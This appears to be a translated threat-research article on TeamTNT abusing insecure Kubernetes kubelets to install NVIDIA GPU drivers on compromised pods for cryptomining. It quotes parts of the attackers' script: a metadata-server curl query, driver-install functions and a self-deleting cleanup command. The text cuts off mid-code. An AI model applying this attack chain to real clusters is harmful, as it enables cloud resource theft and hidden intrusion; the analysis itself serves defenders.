概述
Kubernetes 部署已成为攻击者的目标,作为破坏云环境以控制工作负载并利用云的力量执行未经授权的任务的一种手段。早期的研究强调了TeamTNT威胁组织如何对大规模Kubernetes部署进行攻击[1]。TeamTNT 以攻击不安全和易受攻击的 Kubernetes 部署而闻名,以进一步列举云基础设施 [2] 以渗透到组织的专用环境中并将其转变为攻击启动板。在本文中,我们介绍了 TeamTNT 引入的一个新模块,该模块通过在集群节点中运行的受感染 Pod 上安装相关驱动程序来利用 NVIDIA 的 GPU 功能来执行高级挖矿操作。为清楚起见,TeamTNT 未利用 NVIDIA 驱动程序中的安全漏洞。
了解攻击模型:用于加密挖掘操作的 Kubernetes
首先了解TeamTNT的攻击模型是很重要的,然后我们才能剖析它的端到端工作。详细信息如图 1 所示。
图 1:TeamTNT Kubernetes 攻击模型。
图 2 显示了完整的工作流程。
图 2:工作流。
我们先来看一下感染模型:
- 利用不安全的 kubelet。最近已经确定,由于不安全的配置和固有的漏洞,攻击者将 Kubernetes 安装中的 kubelet 组件作为目标。
根据 Kubernetes 文档 [3] 中提供的详细信息,kubelet 是:
'...在 [Kubernetes] 集群中的每个节点 [4] 上运行的代理。它确保容器 [5] 在 Pod [6] 中运行。
'kubelet 采用一组通过各种机制提供的 PodSpec,并确保这些 PodSpec 中描述的容器正在运行且健康。kubelet 不管理不是由 Kubernetes 创建的容器。
TeamTNT 攻击利用默认的 Kubernetes 安装,因为配置的 kubelet 运行不安全。因此,默认情况下,任何人都可以对 kubelet 进行身份验证,因为它在 anonymous-auth 标志设置为 true 的情况下运行。
- 破坏节点中配置的 Pod。一旦攻击者破坏了 kubelet,它就会开始破坏节点中配置的 pod。为此,攻击者通过利用权限升级缺陷触发远程命令执行。例如,要完全控制节点中的一个容器 (pod),攻击者首先要获得该容器的 root 权限。建立 root 权限后,受感染的容器将用于触发横向移动或以节点中的其他容器 (Pod) 为目标。
- 下载恶意负载。一旦 Pod 遭到入侵,攻击者就会从远程位置下载恶意负载以安装高级负载或工具。这使攻击者能够根据要求使用不同的工具。
- 更新受损 Pod 上的软件包。通过安装新软件包(如 NVIDIA 驱动程序)来增强 GPU 功能,从而增强受感染的 Pod 环境。这有助于攻击者将受感染的 pod(容器)武器化,并利用底层硬件进行操作。
- 执行加密挖矿操作。一旦 pod 通过安装其他驱动程序进行更新,就会激活加密矿工并启动相关进程以执行加密挖掘操作。Pod 的增强功能用于挖矿,从而将挖矿成本转嫁给云基础设施的所有者。
- 触发 C&C 通信。恶意代码与C&C服务器通信,并从受感染的Pod中提取敏感数据。
研究分析
在本节中,我们将介绍有关TeamTNT使用NVIDIA驱动程序的更多详细信息。
远程服务器托管包
发现了一个托管不同 Kubernetes 感染工具(脚本)和模块的远程服务器,如图 3 所示。
图 3:托管不同 Kubernetes 感染工具(脚本)和模块的服务器。
您可以看到目录中列出的不同类型的 shell 脚本。install-NVIDIA-drivers.sh 和目录 gpu 等安装脚本已在列出的资源中标识。
图 4:突出显示 bash 脚本存在的目录结构。
图 4 中所示的目录结构突出显示了 bash 脚本的存在,其中一个脚本是 nvidia.sh。
剖析 NVIDIA 安装脚本
nvidia.sh 脚本用于下载NVIDIA驱动程序并安装它们,以增强底层硬件的功能。让我们分析一下这个脚本。
图 5:Nvidia.sh 脚本。
使用 base64 实用程序解码字符串时,会显示消息“NVIDIA Installer”,如下所示。
图 6:解码字符串时显示的消息。
该脚本获取以下 NVIDIA 包:
| 包 | 描述 |
| 英伟达无头-450 [7] | 这个包只是一组其他包的保护伞,它没有描述。
|
| 英伟达驱动程序-450 | NVIDIA 450 系列驱动程序支持 |
| nvidia-compute-utils-450 | 此软件包为使用 NVIDIA 驱动程序的并行通用计算用例提供实用程序二进制文件 |
| nvidia-cuda-工具包 | NVIDIA 工具,用于调试在 Linux 和 QNX 上运行的 CUDA 应用程序 |
此外,还介绍了脚本的不同变体。
图 7:脚本的不同变体。
让我们剖析此脚本以获取更多信息。
查询元数据服务器
安装脚本旨在获取元数据,以便在受感染的系统上安装新模块和软件包。每个 VM 都将其元数据存储在集中式元数据服务器上,无需任何额外授权即可直接访问。元数据是以自动方式安装新脚本和包所必需的。为此,安装脚本需要元数据服务器提供的其他 VM 信息。通常,默认情况下,VM 有权访问元数据。TeamTNT 利用以下 CURL 命令从 Google Cloud 中托管的受损虚拟机查询元数据服务器:
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> get_metadata_value</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> curl </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">--</span></span><span style="color:#1e347b"><span style="color:#1e347b">retry</span></span> <span style="color:#195f91"><span style="color:#195f91">5</span></span><span style="color:#48484c"><span style="color:#48484c"> \</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">s \</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f \</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">H </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Metadata-Flavor: Google"</span></span><span style="color:#48484c"><span style="color:#48484c"> \</span></span>
<span style="color:#dd1144"><span style="color:#dd1144">"http://metadata/computeMetadata/v1/$1"</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> get_attribute_value</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> get_metadata_value </span></span><span style="color:#dd1144"><span style="color:#dd1144">"instance/attributes/$1"</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>如果分析上面的 CURL 命令,它会使用 Metadata-Flavor: Google(“key: value”对)设置 -H 参数。HTTP 请求标头向元数据服务器指示 VM 需要元数据才能执行特定操作,并且请求不是来自不安全的源。此策略非常有效,因为 VM 已遭到入侵,并且信任边界已中断。
安装 Linux 内核头文件
Linux 发行版由内核、内核头文件和额外模块组成。内核标头用于显式定义不同的设备接口,突出显示源文件中函数的定义方式。内核头文件支持编译器通过验证头文件中可用的函数签名(返回值和参数)来检查函数的使用是否合法和正确。该脚本将安装 Linux 头文件包,该包提供将内核头文件用于特定内核版本的功能(检查 uname -a)。内核头文件提供接口来帮助内核模块进行通信和访问硬件。脚本中使用的内核头文件安装代码如下所示:
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> install_linux_headers</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># Install linux headers. Note that the kernel version might be changed after</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># installing the gvnic version. For example: 4.19.0-8-cloud-amd64 -></span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># 4.19.0-9-cloud-amd64. So we install the kernel headers for each driver</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># installation.</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"install linux headers: linux-headers-$(uname -r)"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> sudo apt install </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">y linux</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">headers</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#dd1144"><span style="color:#dd1144">"$(uname -r)"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">||</span></span> <span style="color:#1e347b"><span style="color:#1e347b">exit</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>
自我删除和文件清理
在受感染的系统上安装驱动程序后,该脚本具有自删除功能,可在成功执行后从系统中删除其所有痕迹。执行以下命令:
rm -f nvidia.sh 2>/dev/null 1>/dev/null
特定于操作系统的驱动程序安装
该脚本可以通过验证 Pod(容器)中已安装的操作系统来安装特定于操作系统的驱动程序。主要例程如下:
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#48484c"><span style="color:#48484c">main</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> install_linux_headers</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># shellcheck source=/opt/deeplearning/driver-version.sh disable=SC1091</span></span>
<span style="color:#48484c"><span style="color:#48484c"> source </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DL_PATH}/driver-version.sh"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">export</span></span><span style="color:#48484c"><span style="color:#48484c"> DRIVER_GCS_PATH</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># Custom GCS driver location via instance metadata.</span></span>
<span style="color:#48484c"><span style="color:#48484c"> DRIVER_GCS_PATH</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">(</span></span><span style="color:#48484c"><span style="color:#48484c">get_attribute_value nvidia</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">driver</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">gcs</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">path</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">)</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${OS_IMAGE_FAMILY}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">==</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${OS_DEBIAN9}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">||</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${OS_IMAGE_FAMILY}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">==</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${OS_DEBIAN10}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> install_driver_debian</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${OS_IMAGE_FAMILY}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">==</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${OS_UBUNTU1804}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> install_driver_ubuntu</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span></span></span>
Ubuntu 上的 NVIDIA 驱动程序部署
该脚本使用函数 install_driver_ubuntu() 检查并安装适用于 Ubuntu 操作系统的 NVIDIA 驱动程序。详情如下:
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#93a1a1"><span style="color:#93a1a1"># For Ubuntu OS</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> install_driver_ubuntu</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"DRIVER_UBUNTU_DEB: ${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"DRIVER_UBUNTU_PKG: ${DRIVER_UBUNTU_PKG}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">z </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_GCS_PATH}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> DRIVER_GCS_PATH</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"gs://dl-platform-public-nvidia/${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Downloading driver from GCS location and install: ${DRIVER_GCS_PATH}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">set</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">e</span></span>
<span style="color:#48484c"><span style="color:#48484c"> gsutil </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">q cp </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_GCS_PATH}"</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">set</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">e</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># Download driver via http if GCS failed.</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> driver_url_path</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"https://developer.download.nvidia.com/compute/cuda/${DRIVER_UBUNTU_CUDA_VERSION}/local_installers/${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> download_driver_via_http </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_url_path}"</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> driver_url_path</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"https://us.download.nvidia.com/tesla/${DRIVER_VERSION}/${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> download_driver_via_http </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_url_path}"</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Failed to find drivers!"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">exit</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c"> wget </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">nv https</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">:</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">//developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin</span></span>
<span style="color:#48484c"><span style="color:#48484c"> sudo mv cuda</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">ubuntu1804</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">pin </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">etc</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">apt</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">preferences</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">d</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">cuda</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">repository</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">pin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#195f91"><span style="color:#195f91">600</span></span>
<span style="color:#48484c"><span style="color:#48484c"> dpkg </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">i </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">||</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Failed to install ${DRIVER_UBUNTU_DEB}..exit"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">exit</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#48484c"><span style="color:#48484c"> apt</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">key add </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#1e347b"><span style="color:#1e347b">var</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">cuda</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">repo</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-*</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/*.pub || apt-key add /var/nvidia-driver*/</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">*.</span></span><span style="color:#48484c"><span style="color:#48484c">pub </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">||</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Failed to add apt-key...exit"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">exit</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#48484c"><span style="color:#48484c"> sudo apt update</span></span>
<span style="color:#48484c"><span style="color:#48484c"> sudo apt remove </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">y </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_PKG}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> sudo apt </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">y autoremove </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">&&</span></span><span style="color:#48484c"><span style="color:#48484c"> sudo apt install </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">y </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_PKG}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">rf </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_UBUNTU_DEB}"</span></span><span style="color:#48484c"><span style="color:#48484c"> cuda</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">update1804</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">pin</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>
在 Debian 上部署 NVIDIA 驱动程序
该脚本使用函数 install_driver_debian() 来检查和安装 Debian 操作系统的 NVIDIA 驱动程序。详情如下:
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#93a1a1"><span style="color:#93a1a1"># For Debian-like OS</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> install_driver_debian</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"DRIVER_VERSION: ${DRIVER_VERSION}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">local</span></span><span style="color:#48484c"><span style="color:#48484c"> driver_installer_file_name</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"driver_installer.run"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">local</span></span><span style="color:#48484c"><span style="color:#48484c"> nvidia_driver_file_name</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"NVIDIA-Linux-x86_64-${DRIVER_VERSION}.run"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">z </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${DRIVER_GCS_PATH}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> DRIVER_GCS_PATH</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"gs://nvidia-drivers-us-public/tesla/${DRIVER_VERSION}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">local</span></span><span style="color:#48484c"><span style="color:#48484c"> driver_gcs_file_path</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span><span style="color:#48484c"><span style="color:#48484c">DRIVER_GCS_PATH</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">}/</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span><span style="color:#48484c"><span style="color:#48484c">nvidia_driver_file_name</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Downloading driver from GCS location and install: ${driver_gcs_file_path}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">set</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">e</span></span>
<span style="color:#48484c"><span style="color:#48484c"> gsutil </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">q cp </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_gcs_file_path}"</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${driver_installer_file_name}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">set</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">e</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># Download driver via http if GCS failed.</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_installer_file_name}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> driver_url_path</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#dd1144"><span style="color:#dd1144">"http://us.download.nvidia.com/tesla/${DRIVER_VERSION}/${nvidia_driver_file_name}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> download_driver_via_http </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_url_path}"</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"${driver_installer_file_name}"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_installer_file_name}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Failed to find drivers!"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">exit</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c"> chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x $</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span><span style="color:#48484c"><span style="color:#48484c">driver_installer_file_name</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#48484c"><span style="color:#48484c"> sudo </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">./</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span><span style="color:#48484c"><span style="color:#48484c">driver_installer_file_name</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">--</span></span><span style="color:#48484c"><span style="color:#48484c">dkms </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">a </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">s </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">--</span></span><span style="color:#1e347b"><span style="color:#1e347b">no</span></span><span 